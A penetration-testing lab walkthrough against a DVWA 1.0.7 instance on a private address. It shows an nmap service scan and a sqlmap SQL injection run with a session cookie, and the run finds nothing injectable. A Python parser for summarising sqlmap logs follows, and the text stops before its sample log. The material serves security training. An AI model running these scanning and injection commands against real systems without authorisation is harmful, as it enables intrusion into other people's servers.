Target = DVWA version 1.0.7
nmap the target
root@bt:~# nmap -sS -Pn -sV 172.16.0.12 -vvv

Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-27 03:40 SGT
NSE: Loaded 17 scripts for scanning.
Initiating ARP Ping Scan at 03:40
Scanning 172.16.0.12 [1 port]
Completed ARP Ping Scan at 03:40, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:40
Completed Parallel DNS resolution of 1 host. at 03:40, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 03:40
Scanning 172.16.0.12 [1000 ports]
Discovered open port 22/tcp on 172.16.0.12
Discovered open port 443/tcp on 172.16.0.12
Discovered open port 21/tcp on 172.16.0.12
Discovered open port 80/tcp on 172.16.0.12
Discovered open port 3306/tcp on 172.16.0.12
Completed SYN Stealth Scan at 03:40, 0.10s elapsed (1000 total ports)
Initiating Service scan at 03:40
Scanning 5 services on 172.16.0.12
Completed Service scan at 03:40, 12.09s elapsed (5 services on 1 host)
NSE: Script scanning 172.16.0.12.
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 172.16.0.12
Host is up (0.00014s latency).
Scanned at 2012-10-27 03:40:34 SGT for 13s
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2c
22/tcp   open  ssh      OpenSSH 5.3p1 Debian 3ubuntu4 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
443/tcp  open  ssl/http Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:5E:88:A5 (Cadmus Computer Systems)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.80 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.048KB)
root@bt:~#
The -sS option selects a TCP SYN scan, -sV probes each open port to identify the service and its version, -Pn skips the ping (host discovery) step to save time, and -v (or several vs, as in -vvv here) increases the verbosity of the output.
From the nmap output we know that the DBMS is MySQL (3306/tcp is open), which is why sqlmap is given --dbms=mysql below.
SQLmap
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "172.16.0.12/vulnerabilities/sqli/" --data="id=a&Submit=Submit" --dbms="mysql" --cookie="PHPSESSID=01ti90d7e7paq7vcgk0ajt3ii1; security=low" --level=5

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:16:15

[04:16:16] [INFO] testing connection to the target url
[04:16:16] [INFO] testing if the url is stable, wait a few seconds
[04:16:17] [INFO] url is stable
[04:16:17] [INFO] testing if POST parameter 'id' is dynamic
[04:16:17] [WARNING] POST parameter 'id' appears to be not dynamic
[04:16:17] [WARNING] reflective value(s) found and filtering out
[04:16:17] [WARNING] heuristic test shows that POST parameter 'id' might not be injectable
[04:16:17] [INFO] testing for SQL injection on POST parameter 'id'
[04:16:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:16:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:16:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:16:24] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:16:26] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:16:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:16:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:16:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:16:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:16:26] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:16:26] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:16:26] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:16:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:16:26] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:16:26] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:16:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:16:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:16:30] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:16:30] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:16:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:16:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:16:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:16:31] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:16:31] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:16:31] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:16:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:16:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:16:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:16:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:16:40] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:16:47] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:16:53] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:16:59] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:17:06] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:17:12] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:17:18] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:17:25] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:17:31] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:17:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:17:44] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:17:52] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:17:59] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:18:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:18:13] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:18:20] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:18:27] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:18:33] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:18:40] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:18:46] [WARNING] POST parameter 'id' is not injectable
[04:18:46] [INFO] testing if POST parameter 'Submit' is dynamic
[04:18:46] [WARNING] POST parameter 'Submit' appears to be not dynamic
[04:18:46] [WARNING] heuristic test shows that POST parameter 'Submit' might not be injectable
[04:18:47] [INFO] testing for SQL injection on POST parameter 'Submit'
[04:18:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:18:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:18:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:18:53] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:18:55] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:18:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:18:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:18:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:18:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:18:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:18:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:18:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:18:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:18:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:18:56] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:18:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:18:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:19:00] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:19:01] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:19:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:19:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:19:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:19:01] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:19:01] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:19:01] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:19:01] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:19:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:19:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:19:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:19:11] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:19:18] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:19:24] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:19:30] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:19:36] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:19:42] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:19:49] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:19:55] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:20:01] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:20:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:20:15] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:20:22] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:20:28] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:20:34] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:20:40] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:20:46] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:20:53] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:20:59] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:21:05] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:21:11] [WARNING] POST parameter 'Submit' is not injectable
[04:21:11] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
sqlmap got a 302 redirect to 'http://172.16.0.12:80/login.php'. Do you want to follow? [Y/n]
[04:22:30] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic
[04:22:30] [INFO] Cookie parameter 'PHPSESSID' is dynamic
[04:22:30] [WARNING] heuristic test shows that Cookie parameter 'PHPSESSID' might not be injectable
[04:22:30] [INFO] testing for SQL injection on Cookie parameter 'PHPSESSID'
[04:22:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n]
[04:22:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:22:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:22:39] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:22:40] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:22:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:22:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:22:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:22:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:22:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:22:41] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:22:41] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:22:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:22:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:22:41] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:22:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:22:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:22:44] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:22:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:22:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:22:45] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:22:45] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:22:45] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:22:45] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:22:45] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:22:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:22:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:22:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:22:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:22:55] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:23:03] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:23:09] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:23:16] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:23:23] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:23:30] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:23:37] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:23:44] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:23:51] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:23:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:24:05] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:24:13] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:24:20] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:24:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:24:33] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:24:40] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:24:47] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:24:54] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:25:01] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:25:08] [WARNING] Cookie parameter 'PHPSESSID' is not injectable
[04:25:08] [WARNING] Cookie parameter 'security' appears to be not dynamic
[04:25:08] [WARNING] heuristic test shows that Cookie parameter 'security' might not be injectable
[04:25:08] [INFO] testing for SQL injection on Cookie parameter 'security'
[04:25:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:25:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:25:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:25:12] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:25:13] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:25:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:25:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:25:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:25:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:25:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:25:14] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:25:14] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:25:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:25:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:25:14] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:25:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:25:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:25:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:25:17] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:25:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:25:18] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:25:18] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:25:18] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:25:18] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:25:18] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:25:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:25:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:25:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:25:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:25:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:25:35] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:25:42] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:25:50] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:25:57] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:26:04] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:26:11] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:26:18] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:26:25] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:26:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:26:39] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:26:47] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:26:54] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:27:01] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:27:08] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:27:15] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:27:22] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:27:28] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:27:35] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:27:43] [WARNING] Cookie parameter 'security' is not injectable
[04:27:43] [WARNING] User-Agent parameter 'User-Agent' appears to be not dynamic
[04:27:43] [WARNING] heuristic test shows that User-Agent parameter 'User-Agent' might not be injectable
[04:27:43] [INFO] testing for SQL injection on User-Agent parameter 'User-Agent'
[04:27:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:27:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:27:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:27:47] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:27:48] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:27:48] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:27:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:27:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:27:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:27:49] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:27:49] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:27:49] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:27:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:27:49] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:27:49] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:27:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:27:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:27:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:27:52] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:27:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:27:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:27:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:27:53] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:27:53] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:27:53] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:27:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:27:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:27:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:27:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:28:03] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:28:11] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:28:18] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:28:25] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:28:32] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:28:39] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:28:46] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:28:53] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:29:00] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:29:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:29:14] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:29:21] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:29:29] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:29:35] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:29:43] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:29:50] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:29:57] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:30:04] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:30:11] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:30:18] [WARNING] User-Agent parameter 'User-Agent' is not injectable
[04:30:18] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[*] shutting down at 04:30:18
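Reading a run like this by hand is tedious, so here is a small parser for sqlmap's console format that summarises each tested parameter (techniques tried, time spent, verdict) and turns the conditions visible in the log above (the 302 to login.php, parameters reported "not dynamic") into plain-language hints about why a scan of a known-vulnerable page can come back empty. This is an added example, not part of the original write-up and not sqlmap's own code; the sample log is a constructed excerpt in the same shape as the run above, and the "is vulnerable" verdict wording is an assumption about sqlmap's positive message, which does not occur in these logs.

```python
import re
from dataclasses import dataclass, field

# Line shapes as sqlmap prints them in the logs above. The 'is vulnerable' wording for
# a positive verdict does not occur in those logs and is assumed from sqlmap's output.
ENTRY_RE = re.compile(r"^\[(\d\d):(\d\d):(\d\d)\] \[(INFO|WARNING|ERROR|CRITICAL)\] (.*)$")
PARAM_RE = re.compile(
    r"^(?:testing for SQL injection on (\S+) parameter '([^']+)'$"
    r"|(\S+) parameter '([^']+)' (appears to be not dynamic|is not injectable|is vulnerable))")
TECH_RE = re.compile(r"^testing '(.+)'$")
REDIRECT_RE = re.compile(r"got a 30\d redirect to '([^']+)'")

@dataclass
class ParamResult:
    place: str                          # GET, POST, Cookie, User-Agent, ...
    name: str
    dynamic: bool = True                # False once sqlmap says 'appears to be not dynamic'
    techniques: list = field(default_factory=list)
    started: int = 0                    # seconds since midnight, from the log timestamps
    finished: int = 0
    verdict: str = "unfinished"

@dataclass
class RunSummary:
    params: dict = field(default_factory=dict)      # "POST:id" -> ParamResult
    redirects: list = field(default_factory=list)   # URLs sqlmap offered to follow
    final: str = ""                                 # closing CRITICAL message, if any

def parse_sqlmap_log(text: str) -> RunSummary:
    """Build a per-parameter summary from sqlmap console output."""
    summary = RunSummary()
    current = None                      # parameter whose techniques are being listed
    for raw in text.splitlines():
        line = raw.strip()
        m = REDIRECT_RE.search(line)    # redirect prompts carry no timestamp prefix
        if m:
            summary.redirects.append(m.group(1))
        m = ENTRY_RE.match(line)
        if not m:
            continue                    # banner, blank and prompt lines
        h, mi, s, level, msg = m.groups()
        ts = int(h) * 3600 + int(mi) * 60 + int(s)
        if level == "CRITICAL":
            summary.final = msg
            continue
        m = PARAM_RE.match(msg)
        if m:
            place, name, what = (m.group(1), m.group(2), None) if m.group(1) else m.group(3, 4, 5)
            res = summary.params.setdefault(f"{place}:{name}", ParamResult(place, name))
            if what is None:            # "testing for SQL injection on ..." opens the block
                current, res.started = res, ts
            elif what == "appears to be not dynamic":
                res.dynamic = False
            else:                       # "is not injectable" / "is vulnerable" closes it
                res.finished, res.verdict, current = ts, what[3:], None
            continue
        m = TECH_RE.match(msg)
        if m and current is not None:
            current.techniques.append(m.group(1))
    return summary

def explain(summary: RunSummary) -> list:
    """Plain-language reasons a run against a known-vulnerable page can find nothing."""
    hints = []
    if summary.redirects:
        where = ", ".join(sorted(set(summary.redirects)))
        hints.append(f"redirected to {where}: the tested responses probably came from a "
                     "login page, so the session cookie was missing or not accepted")
    static = [f"{p.place} {p.name}" for p in summary.params.values() if not p.dynamic]
    if static:
        hints.append(f"response did not change with {', '.join(static)}: the application may "
                     "not read the parameter from that location (wrong HTTP method or endpoint)")
    if summary.params and all(p.verdict == "not injectable" for p in summary.params.values()):
        hints.append("no parameter was reported injectable: check method, endpoint and session "
                     "before treating the negative result as proof of absence")
    return hints

# Constructed excerpt in the shape of the first run above (not the full log).
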